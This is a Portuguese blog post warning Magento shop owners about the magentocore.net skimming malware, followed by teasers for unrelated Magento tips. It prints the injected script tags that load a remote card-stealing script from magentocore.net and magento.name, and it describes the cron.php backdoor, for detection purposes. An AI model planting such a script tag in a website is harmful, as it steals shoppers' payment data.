No mês passado, uma infecção de milhares de lojas de Magento foi relatada devido a um malware de um site chamado magentocore.net. Isso é tudo o que você precisa saber e por que não é seguro instalar as coisas sem uma boa revisão.
Esteja ciente do malware magentocore.net
Verifique se o seguinte código foi adicionado ao campo de cabeçalho ou rodapé em seu backend do Magento:
<script type = "text / javascript" src="https://magentocore.net/mage/mage.js"> </script>
Após a primeira onda de ataques e uma proibição do google em hackers de domínio magentocore.net mudou para magento.name
<script type = "text/ javascript" src="https://magento.name/mage/mage.js"> </script>
Esses scripts não parecem prejudiciais à primeira vista, por causa do Magento no nome do domínio.
Essa linha de código solitária carrega e executa o código JavaScript nos navegadores de seus clientes e envia dados de cartão de crédito.
Este malware específico é um demônio. Obviamente, apenas adicionou uma linha de código de inserção de JavaScript. O problema: se você removê-lo, pode estar lá depois de algum tempo novamente.
Como isso é possível? O malware magentocore.net altera seu cron.php e adiciona um backdoor em qualquer lugar/pasta de sua instalação Magento. Sua loja não é mais segura e identificar todos os problemas poderá levar muito tempo e ainda assim deixar alguma brecha de segurança.
Volte para a última versão válida do seu repositório.
Entre em contato para que eu possa te ajuda!
Segurança: Atualizações frequentes geralmente incluem patches de segurança para corrigir vulnerabilidades identificadas. Ao manter o Magento atualizado, você reduz significativamente…
Como adicionar uma mensagem de Alerta ou Aviso do Admin do Magento 2 Injete o Magento\Framework\Message\ManagerInterface no construtor da sua…
Para exibir as mensagens adicionadas na classe Magento\Framework\Message\ManagerInterface em um arquivo .phtml, você pode usar o seguinte código: <?php $objectManager…
Para criar um script no Magento 2 que exporte as categorias para um arquivo XML com o nome da categoria,…
Para definir um vídeo MP4 como plano de fundo em um <div> usando HTML e CSS, você pode seguir estas…
Como desativar o "lastname" no Magento 2 e Adobe Commerce Desativando a obrigatoriedade do campo Execute a SQL abaixo diretamente…